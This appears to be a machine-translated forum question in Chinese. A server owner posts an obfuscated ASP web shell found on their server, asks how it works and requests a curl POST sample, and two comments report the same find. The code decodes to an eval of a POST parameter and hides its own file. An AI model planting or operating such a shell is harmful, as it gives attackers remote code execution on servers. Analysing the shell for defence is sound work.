我发现我的服务器,它做了一些不好的事情上有趣的恶意软件。 现在我试图对其进行逆向工程,但由于完全缺乏VB \ ASP的知识,我需要向您的同事求助。VB恶意软件工具反向工程
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
据我了解 - 它执行一些命令并创建文件的某个地方与system \ hidden属性。 主要问题是 - 如何使用它,即从我看到的日志中,黑客上传这个文件并使用POST命令。我也希望这个命令能够理解,他如何能够将文件上传到某些文件夹,他应该能够这样做。
的任何建议都欢迎。卷曲POST样本将是惊人的。
说,你有没有想过如何到达那里的恶意软件?我刚刚在我的服务器上发现了这个(使用Adodb.Stream而不是FileSystemObject)。需要了解如何到达那里。 – tofutim 2015-10-15 21:17:18
@tofutim我发现在一个与安全系统不佳的Windows服务器上相同...实际上不止一次在最后一年,很浪费时间:( – MattAllegro 2016-01-21 19:25:03